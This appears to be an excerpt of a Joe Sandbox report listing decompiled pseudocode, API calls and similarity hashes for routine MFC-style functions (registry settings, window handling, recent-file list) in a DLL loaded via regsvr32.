                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                                                                        • String ID:
                                                                        • API String ID: 670545878-0
                                                                        • Opcode ID: b64e7204216b1f048a42a3b80a98cdaf99d57a40f09b93da801bfd405b8b7097
                                                                        • Instruction ID: ef498eb2053f32fc83163eb1be06eb9c016c70d7a0359ba6d8f1e9348af6cf1d
                                                                        • Opcode Fuzzy Hash: b64e7204216b1f048a42a3b80a98cdaf99d57a40f09b93da801bfd405b8b7097
                                                                        • Instruction Fuzzy Hash: E111A332601F764FD362DA6AACA4B2B77DCDF41BD1FD20159EC04D7211DB60EC104290
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E1002B501(intOrPtr __ecx, CHAR* _a4, char* _a8, char* _a12) {
                                                                        				long _t21;
                                                                        				void* _t28;
                                                                        
                                                                        				if( *((intOrPtr*)(__ecx + 0x50)) == 0) {
                                                                        					return WritePrivateProfileStringA(_a4, _a8, _a12,  *(__ecx + 0x64));
                                                                        				}
                                                                        				if(_a8 != 0) {
                                                                        					_t28 = E10035959(__ecx, _a4);
                                                                        					if(_a12 != 0) {
                                                                        						if(_t28 == 0) {
                                                                        							L3:
                                                                        							return 0;
                                                                        						}
                                                                        						_t21 = RegSetValueExA(_t28, _a8, 0, 1, _a12, lstrlenA(_a12) + 1);
                                                                        						L10:
                                                                        						RegCloseKey(_t28);
                                                                        						return 0 | _t21 == 0x00000000;
                                                                        					}
                                                                        					if(_t28 == 0) {
                                                                        						goto L3;
                                                                        					}
                                                                        					_t21 = RegDeleteValueA(_t28, _a8);
                                                                        					goto L10;
                                                                        				}
                                                                        				_t28 = E100358C8(__ecx);
                                                                        				if(_t28 != 0) {
                                                                        					_t21 = RegDeleteKeyA(_t28, _a4);
                                                                        					goto L10;
                                                                        				}
                                                                        				goto L3;
                                                                        			}






                                                                        APIs
                                                                        • RegDeleteKeyA.ADVAPI32(00000000,?), ref: 1002B525
                                                                        • RegDeleteValueA.ADVAPI32(00000000,00000000,?,00000000), ref: 1002B545
                                                                        • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,10024C29,?), ref: 1002B570
                                                                          • Part of subcall function 100358C8: RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?,00000000,00000000), ref: 100358F6
                                                                          • Part of subcall function 100358C8: RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 10035919
                                                                          • Part of subcall function 100358C8: RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,00000000,?), ref: 10035935
                                                                          • Part of subcall function 100358C8: RegCloseKey.ADVAPI32(?), ref: 10035945
                                                                          • Part of subcall function 100358C8: RegCloseKey.ADVAPI32(?), ref: 1003594F
                                                                        • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 1002B58B
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Close$CreateDelete$OpenPrivateProfileStringValueWrite
                                                                        • String ID:
                                                                        • API String ID: 1886894508-0
                                                                        • Opcode ID: cbf87bc0068c303cc6394e99f804432e3955d1a9386c7571ee80164618b64494
                                                                        • Instruction ID: c8f527a64b8234d0edd8db9930868310c0db2fd70ee1d53d59517915cf010f6f
                                                                        • Opcode Fuzzy Hash: cbf87bc0068c303cc6394e99f804432e3955d1a9386c7571ee80164618b64494
                                                                        • Instruction Fuzzy Hash: D1114832401E79FFDB128F61DC48F9E3BA9EF043A1F814510FD049D061CB328A61AB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 46%
                                                                        			E10031F4A(void* __ebx, void* __ecx, void* __edi, void* __esi, struct HWND__* _a4, intOrPtr _a8) {
                                                                        				intOrPtr _v8;
                                                                        				char _v528;
                                                                        				void* _v532;
                                                                        				char _v536;
                                                                        				intOrPtr _t15;
                                                                        				long _t22;
                                                                        				void* _t25;
                                                                        				void* _t29;
                                                                        
                                                                        				_t15 =  *0x1004c470; // 0x303bb91f
                                                                        				_v8 = _t15;
                                                                        				_push( &_v532);
                                                                        				_push( &_v536);
                                                                        				_push(_a8);
                                                                        				_push(0x3e8);
                                                                        				_t29 = __ecx;
                                                                        				L1001CA38();
                                                                        				if(lstrlenA(GlobalLock(_v532)) < 0x208) {
                                                                        					_t22 = GlobalUnlock(_v532);
                                                                        					_push(_v532);
                                                                        					_push(0x8000);
                                                                        					_push(0x3e4);
                                                                        					_push(0x3e8);
                                                                        					_push(_a8);
                                                                        					L1001CA32();
                                                                        					PostMessageA(_a4, 0x3e4,  *(_t29 + 0x1c), _t22);
                                                                        					if(E100203CE(_t29) != 0) {
                                                                        						_t25 = E100373B5();
                                                                        						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t25 + 4)))) + 0xa0))( &_v528);
                                                                        					}
                                                                        				}
                                                                        				return E100117AE(0, _v8);
                                                                        			}












                                                                        APIs
                                                                        • UnpackDDElParam.USER32 ref: 10031F76
                                                                        • GlobalLock.KERNEL32 ref: 10031F81
                                                                        • lstrlenA.KERNEL32(00000000), ref: 10031F88
                                                                        • GlobalUnlock.KERNEL32(?), ref: 10031F9C
                                                                        • ReuseDDElParam.USER32(?,000003E8,000003E4,00008000,?), ref: 10031FB7
                                                                        • PostMessageA.USER32 ref: 10031FC4
                                                                          • Part of subcall function 100203CE: IsWindowEnabled.USER32(?), ref: 100203D7
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: GlobalParam$EnabledLockMessagePostReuseUnlockUnpackWindowlstrlen
                                                                        • String ID:
                                                                        • API String ID: 462239228-0
                                                                        • Opcode ID: 9b3d271c77589773dafac36f7ca5bc7fab3ad5ea6926df52b529a664096dacb0
                                                                        • Instruction ID: bfbb9d00b13f65a0ab326070f2ebd1bafe94df8b281a4b7973d805b3987b007f
                                                                        • Opcode Fuzzy Hash: 9b3d271c77589773dafac36f7ca5bc7fab3ad5ea6926df52b529a664096dacb0
                                                                        • Instruction Fuzzy Hash: 8D111C3554121CAFDB12DFA1DC88DDE7BB9FF55351F0045A5F809EA262DA34DE808B60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E10029BA4(struct HWND__* _a4) {
                                                                        				struct HWND__* _t3;
                                                                        				struct HWND__* _t6;
                                                                        				struct HWND__* _t11;
                                                                        				struct HWND__* _t14;
                                                                        
                                                                        				_t3 = GetFocus();
                                                                        				_t14 = _t3;
                                                                        				if(_t14 != 0) {
                                                                        					_t11 = _a4;
                                                                        					if(_t14 == _t11) {
                                                                        						L10:
                                                                        						return _t3;
                                                                        					}
                                                                        					if(E10029A8E(_t14, 3) != 0) {
                                                                        						L5:
                                                                        						if(_t11 == 0 || (GetWindowLongA(_t11, 0xfffffff0) & 0x40000000) == 0) {
                                                                        							L8:
                                                                        							_t3 = SendMessageA(_t14, 0x14f, 0, 0);
                                                                        							goto L9;
                                                                        						} else {
                                                                        							_t6 = GetParent(_t11);
                                                                        							_t3 = GetDesktopWindow();
                                                                        							if(_t6 == _t3) {
                                                                        								L9:
                                                                        								goto L10;
                                                                        							}
                                                                        							goto L8;
                                                                        						}
                                                                        					}
                                                                        					_t3 = GetParent(_t14);
                                                                        					_t14 = _t3;
                                                                        					if(_t14 == _t11) {
                                                                        						goto L9;
                                                                        					}
                                                                        					_t3 = E10029A8E(_t14, 2);
                                                                        					if(_t3 == 0) {
                                                                        						goto L9;
                                                                        					}
                                                                        					goto L5;
                                                                        				}
                                                                        				return _t3;
                                                                        			}








                                                                        APIs
                                                                        • GetFocus.USER32 ref: 10029BA5
                                                                          • Part of subcall function 10029A8E: GetWindowLongA.USER32 ref: 10029AA7
                                                                        • GetParent.USER32(00000000), ref: 10029BCE
                                                                          • Part of subcall function 10029A8E: GetClassNameA.USER32(00000000,?,0000000A), ref: 10029AC2
                                                                          • Part of subcall function 10029A8E: lstrcmpiA.KERNEL32(?,combobox), ref: 10029AD1
                                                                        • GetWindowLongA.USER32 ref: 10029BE9
                                                                        • GetParent.USER32(10032120), ref: 10029BF7
                                                                        • GetDesktopWindow.USER32 ref: 10029BFB
                                                                        • SendMessageA.USER32 ref: 10029C0F
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Window$LongParent$ClassDesktopFocusMessageNameSendlstrcmpi
                                                                        • String ID:
                                                                        • API String ID: 2818563221-0
                                                                        • Opcode ID: e89a53c623c721cb0c3fcde6a2588c450b9b76455553080e70e491aeb3ad2bbb
                                                                        • Instruction ID: cea5fa679d97d2953b6d76dc507eb4c5e7da3a0c11b163d723fb81d4da4a6e61
                                                                        • Opcode Fuzzy Hash: e89a53c623c721cb0c3fcde6a2588c450b9b76455553080e70e491aeb3ad2bbb
                                                                        • Instruction Fuzzy Hash: 7FF0A932500A306EE353A62B6D88F5E61D8DF81BD0FB20214F459E6192EB24AC8145A9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 91%
                                                                        			E10037A96(void* _a4, char* _a8, char* _a12) {
                                                                        				void* _t14;
                                                                        				long _t18;
                                                                        				signed int _t20;
                                                                        				long _t25;
                                                                        
                                                                        				if(_a12 != 0) {
                                                                        					if(RegCreateKeyA(0x80000000, _a4,  &_a4) != 0) {
                                                                        						L6:
                                                                        						_t14 = 0;
                                                                        						L7:
                                                                        						return _t14;
                                                                        					}
                                                                        					_t25 = RegSetValueExA(_a4, _a12, 0, 1, _a8, lstrlenA(_a8) + 1);
                                                                        					_t18 = RegCloseKey(_a4);
                                                                        					if(_t18 != 0 || _t25 != 0) {
                                                                        						goto L6;
                                                                        					} else {
                                                                        						_t14 = _t18 + 1;
                                                                        						goto L7;
                                                                        					}
                                                                        				}
                                                                        				_t20 = RegSetValueA(0x80000000, _a4, 1, _a8, lstrlenA(_a8));
                                                                        				asm("sbb eax, eax");
                                                                        				return  ~_t20 + 1;
                                                                        			}








                                                                        APIs
                                                                        • lstrlenA.KERNEL32(?), ref: 10037AA2
                                                                        • RegSetValueA.ADVAPI32(80000000,?,00000001,?,00000000), ref: 10037AB6
                                                                        • RegCreateKeyA.ADVAPI32(80000000,?,?), ref: 10037AD0
                                                                        • lstrlenA.KERNEL32(?), ref: 10037ADD
                                                                        • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,?,00000001), ref: 10037AF2
                                                                        • RegCloseKey.ADVAPI32(?), ref: 10037AFD
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Valuelstrlen$CloseCreate
                                                                        • String ID:
                                                                        • API String ID: 306239685-0
                                                                        • Opcode ID: 44992d35b15f20819090c12f9012e6152085e8f08d1dc228d24d782121a6f8e9
                                                                        • Instruction ID: 36ac44db30e1571f4bd1a6b15574b4d5f9e82ccdf85d97020e0dea724d6fc6de
                                                                        • Opcode Fuzzy Hash: 44992d35b15f20819090c12f9012e6152085e8f08d1dc228d24d782121a6f8e9
                                                                        • Instruction Fuzzy Hash: 4501043220016DFFEB235FA1DD48F9A7BA9FB08792F108410FE1AD9061D3718A60DB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 90%
                                                                        			E10029C98(struct HWND__* _a4, struct tagPOINT _a8, intOrPtr _a12) {
                                                                        				struct tagRECT _v20;
                                                                        				struct HWND__* _t12;
                                                                        				struct HWND__* _t21;
                                                                        
                                                                        				ClientToScreen(_a4,  &_a8);
                                                                        				_t12 = GetWindow(_a4, 5);
                                                                        				while(1) {
                                                                        					_t21 = _t12;
                                                                        					if(_t21 == 0) {
                                                                        						break;
                                                                        					}
                                                                        					if(GetDlgCtrlID(_t21) != 0 && (GetWindowLongA(_t21, 0xfffffff0) & 0x10000000) != 0) {
                                                                        						GetWindowRect(_t21,  &_v20);
                                                                        						_push(_a12);
                                                                        						if(PtInRect( &_v20, _a8) != 0) {
                                                                        							return _t21;
                                                                        						}
                                                                        					}
                                                                        					_t12 = GetWindow(_t21, 2);
                                                                        				}
                                                                        				return _t12;
                                                                        			}







                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Rect$ClientCtrlLongScreen
                                                                        • String ID:
                                                                        • API String ID: 1315500227-0
                                                                        • Opcode ID: 3db020920b72c671971993ae9780b3d492816d86ba5cd9127ef1e8eba5203929
                                                                        • Instruction ID: 9b9f6f1c131c314e5c19284c1e668e0a3a9e33f7fca6b6c160f9dd0f3207debf
                                                                        • Opcode Fuzzy Hash: 3db020920b72c671971993ae9780b3d492816d86ba5cd9127ef1e8eba5203929
                                                                        • Instruction Fuzzy Hash: 7A01623650056ABFDB129F569C48EEE37ADEF017D0F514115FD11EA161D730DA01DB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E10022233(intOrPtr* __ecx) {
                                                                        				struct HWND__* _v40;
                                                                        				struct HWND__* _v44;
                                                                        				intOrPtr _v48;
                                                                        				void* _v52;
                                                                        				long _t34;
                                                                        				long _t43;
                                                                        				struct HWND__* _t48;
                                                                        				intOrPtr* _t63;
                                                                        				signed int _t64;
                                                                        				void* _t69;
                                                                        				intOrPtr _t71;
                                                                        				intOrPtr* _t72;
                                                                        
                                                                        				_t72 = __ecx;
                                                                        				_t69 = E1001F7AE();
                                                                        				if(_t69 != 0) {
                                                                        					if( *((intOrPtr*)(_t69 + 0x1c)) == __ecx) {
                                                                        						 *((intOrPtr*)(_t69 + 0x1c)) = 0;
                                                                        					}
                                                                        					if( *((intOrPtr*)(_t69 + 0x20)) == _t72) {
                                                                        						 *((intOrPtr*)(_t69 + 0x20)) = 0;
                                                                        					}
                                                                        				}
                                                                        				_t63 =  *((intOrPtr*)(_t72 + 0x44));
                                                                        				if(_t63 != 0) {
                                                                        					 *((intOrPtr*)( *_t63 + 0x50))();
                                                                        					 *((intOrPtr*)(_t72 + 0x44)) = 0;
                                                                        				}
                                                                        				_t64 =  *(_t72 + 0x48);
                                                                        				if(_t64 != 0) {
                                                                        					 *((intOrPtr*)( *_t64 + 4))(1);
                                                                        				}
                                                                        				 *(_t72 + 0x48) =  *(_t72 + 0x48) & 0x00000000;
                                                                        				if(( *(_t72 + 0x38) & 1) != 0) {
                                                                        					_t71 =  *((intOrPtr*)(E100373DB() + 0x3c));
                                                                        					if(_t71 != 0 &&  *(_t71 + 0x1c) != 0) {
                                                                        						E10011C50( &_v52, 0, 0x30);
                                                                        						_t48 =  *(_t72 + 0x1c);
                                                                        						_v44 = _t48;
                                                                        						_v40 = _t48;
                                                                        						_v52 = 0x28;
                                                                        						_v48 = 1;
                                                                        						SendMessageA( *(_t71 + 0x1c), 0x405, 0,  &_v52);
                                                                        					}
                                                                        				}
                                                                        				_t34 = GetWindowLongA( *(_t72 + 0x1c), 0xfffffffc);
                                                                        				E1002204B(_t72);
                                                                        				if(GetWindowLongA( *(_t72 + 0x1c), 0xfffffffc) == _t34) {
                                                                        					_t43 =  *( *((intOrPtr*)( *_t72 + 0xf0))());
                                                                        					if(_t43 != 0) {
                                                                        						SetWindowLongA( *(_t72 + 0x1c), 0xfffffffc, _t43);
                                                                        					}
                                                                        				}
                                                                        				E10022168(_t72);
                                                                        				return  *((intOrPtr*)( *_t72 + 0x114))();
                                                                        			}
















                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: LongWindow$MessageSend
                                                                        • String ID: (
                                                                        • API String ID: 2178440468-3887548279
                                                                        • Opcode ID: a0256d8b5034a2fee01dc273fb99e3b5b93d09b5292866429bde14ed636a8408
                                                                        • Instruction ID: 74d92888995a03eb436cf4db0a6f1431d092ba1e50ceac8416b65ae125f9645e
                                                                        • Opcode Fuzzy Hash: a0256d8b5034a2fee01dc273fb99e3b5b93d09b5292866429bde14ed636a8408
                                                                        • Instruction Fuzzy Hash: 0C31AD34600615FFCB21DFA9E884A6EB7F8FF04250F52062DE5429B692CB31F848CB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E10032286(intOrPtr* __ecx, int _a4, signed int _a8, intOrPtr _a12) {
                                                                        				void* __ebp;
                                                                        				void* _t29;
                                                                        				int _t30;
                                                                        				void* _t35;
                                                                        				void* _t38;
                                                                        				intOrPtr* _t40;
                                                                        				int _t42;
                                                                        				intOrPtr* _t45;
                                                                        				void* _t46;
                                                                        
                                                                        				_t45 = __ecx;
                                                                        				_t29 = E10022AD5(__ecx);
                                                                        				_t40 =  *((intOrPtr*)(_t45 + 0x7c));
                                                                        				_t42 = _a4;
                                                                        				_t38 = _t29;
                                                                        				if(_t40 == 0) {
                                                                        					L2:
                                                                        					if(_a8 != 0xffff) {
                                                                        						if(_t42 == 0 || (_a8 & 0x00000810) != 0) {
                                                                        							 *(_t45 + 0xa4) =  *(_t45 + 0xa4) & 0x00000000;
                                                                        							goto L17;
                                                                        						} else {
                                                                        							if(_t42 < 0xf000 || _t42 >= 0xf1f0) {
                                                                        								if(_t42 < 0xff00) {
                                                                        									goto L13;
                                                                        								}
                                                                        								 *(_t45 + 0xa4) = 0xef1f;
                                                                        								goto L17;
                                                                        							} else {
                                                                        								_t42 = (_t42 + 0xffff1000 >> 4) + 0xef00;
                                                                        								L13:
                                                                        								 *(_t45 + 0xa4) = _t42;
                                                                        								L17:
                                                                        								 *(_t38 + 0x38) =  *(_t38 + 0x38) | 0x00000040;
                                                                        								L18:
                                                                        								_t30 =  *(_t45 + 0xa4);
                                                                        								if(_t30 ==  *((intOrPtr*)(_t45 + 0xa8))) {
                                                                        									L21:
                                                                        									return _t30;
                                                                        								}
                                                                        								_t30 = E100220EE(_t46, GetParent( *(_t45 + 0x1c)));
                                                                        								if(_t30 == 0) {
                                                                        									goto L21;
                                                                        								}
                                                                        								return PostMessageA( *(_t45 + 0x1c), 0x36a, 0, 0);
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        					 *(_t45 + 0x38) =  *(_t45 + 0x38) & 0xffffffbf;
                                                                        					if( *((intOrPtr*)(_t38 + 0x64)) != 0) {
                                                                        						 *(_t45 + 0xa4) = 0xe002;
                                                                        					} else {
                                                                        						 *(_t45 + 0xa4) = 0xe001;
                                                                        					}
                                                                        					SendMessageA( *(_t45 + 0x1c), 0x362,  *(_t45 + 0xa4), 0);
                                                                        					_t35 =  *((intOrPtr*)( *_t45 + 0x150))();
                                                                        					if(_t35 != 0) {
                                                                        						UpdateWindow( *(_t35 + 0x1c));
                                                                        					}
                                                                        					goto L18;
                                                                        				}
                                                                        				_t30 =  *((intOrPtr*)( *_t40 + 0x7c))(_t42, _a8, _a12);
                                                                        				if(_t30 != 0) {
                                                                        					goto L21;
                                                                        				}
                                                                        				goto L2;
                                                                        			}













                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Message$ParentPostSendUpdateWindow
                                                                        • String ID: @
                                                                        • API String ID: 4141989945-2766056989
                                                                        • Opcode ID: bad5658601269fb567b95f36ded4ee85d4dfb2814405908c13ec14e44f39eb87
                                                                        • Instruction ID: 6191196fd6615e40dc101e77c52f198469b7c7f61996bf1ea28baad2e91494f1
                                                                        • Opcode Fuzzy Hash: bad5658601269fb567b95f36ded4ee85d4dfb2814405908c13ec14e44f39eb87
                                                                        • Instruction Fuzzy Hash: 8D319635601B05EFEB22CF21CD48B5A77E5FF41352F258828E65A9E1A1C7B9A980DB01
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 71%
                                                                        			E10034CE3(void* __ecx, void* __eflags) {
                                                                        				intOrPtr _t18;
                                                                        				intOrPtr* _t20;
                                                                        				intOrPtr _t26;
                                                                        				void* _t33;
                                                                        				void* _t35;
                                                                        
                                                                        				E10011BF0(0x1003a3fc, _t35);
                                                                        				_push(__ecx);
                                                                        				_t33 = __ecx;
                                                                        				 *((intOrPtr*)(_t35 - 0x10)) = 0;
                                                                        				E10034BFF(__ecx, 0x20, _t35 - 0x10);
                                                                        				if( *((intOrPtr*)(_t35 + 8)) != 0 &&  *((intOrPtr*)(_t35 - 0x10)) == 0) {
                                                                        					_t26 = E1001F77E(0x20);
                                                                        					 *((intOrPtr*)(_t35 - 0x10)) = _t26;
                                                                        					_t41 = _t26;
                                                                        					 *(_t35 - 4) = 0;
                                                                        					if(_t26 == 0) {
                                                                        						_t20 = 0;
                                                                        						__eflags = 0;
                                                                        					} else {
                                                                        						_push(0x1e);
                                                                        						_push( *((intOrPtr*)(_t35 + 8)));
                                                                        						_push("File%d");
                                                                        						_push("Recent File List");
                                                                        						_push(0);
                                                                        						_t20 = E10024F0F(_t26, _t41);
                                                                        					}
                                                                        					 *(_t35 - 4) =  *(_t35 - 4) | 0xffffffff;
                                                                        					 *((intOrPtr*)(_t33 + 0x84)) = _t20;
                                                                        					 *((intOrPtr*)( *_t20 + 0x10))();
                                                                        				}
                                                                        				_t18 = E1003599F(_t33, "Settings", "PreviewPages", 0);
                                                                        				 *((intOrPtr*)(_t33 + 0x90)) = _t18;
                                                                        				 *[fs:0x0] =  *((intOrPtr*)(_t35 - 0xc));
                                                                        				return _t18;
                                                                        			}









                                                                        APIs
                                                                        • __EH_prolog.LIBCMT ref: 10034CE8
                                                                          • Part of subcall function 10024F0F: __EH_prolog.LIBCMT ref: 10024F14
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: H_prolog
                                                                        • String ID: File%d$PreviewPages$Recent File List$Settings
                                                                        • API String ID: 3519838083-526586445
                                                                        • Opcode ID: 932e69f2a25fdaf2d1d7247067e9866bd34830d2efb07ad355ada0066ba91e73
                                                                        • Instruction ID: 492fd1891bf7533495f0361d30171d8b100ab146b8dd749383e38376895f11d0
                                                                        • Opcode Fuzzy Hash: 932e69f2a25fdaf2d1d7247067e9866bd34830d2efb07ad355ada0066ba91e73
                                                                        • Instruction Fuzzy Hash: FA01B579A00605AFCB16EF649C05BEEBAB5FB84712F11861FF1569F281DF70A5408750
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 68%
                                                                        			E10028BC6(void* __ecx, intOrPtr _a4) {
                                                                        				struct HINSTANCE__* _t4;
                                                                        				_Unknown_base(*)()* _t5;
                                                                        				void* _t9;
                                                                        				void* _t10;
                                                                        
                                                                        				_t10 = __ecx;
                                                                        				_t4 = GetModuleHandleA("GDI32.DLL");
                                                                        				_t9 = 0;
                                                                        				_t5 = GetProcAddress(_t4, "SetLayout");
                                                                        				if(_t5 == 0) {
                                                                        					if(_a4 != 0) {
                                                                        						_t9 = 0xffffffff;
                                                                        						SetLastError(0x78);
                                                                        					}
                                                                        				} else {
                                                                        					_t9 =  *_t5( *((intOrPtr*)(_t10 + 4)), _a4);
                                                                        				}
                                                                        				return _t9;
                                                                        			}








                                                                        APIs
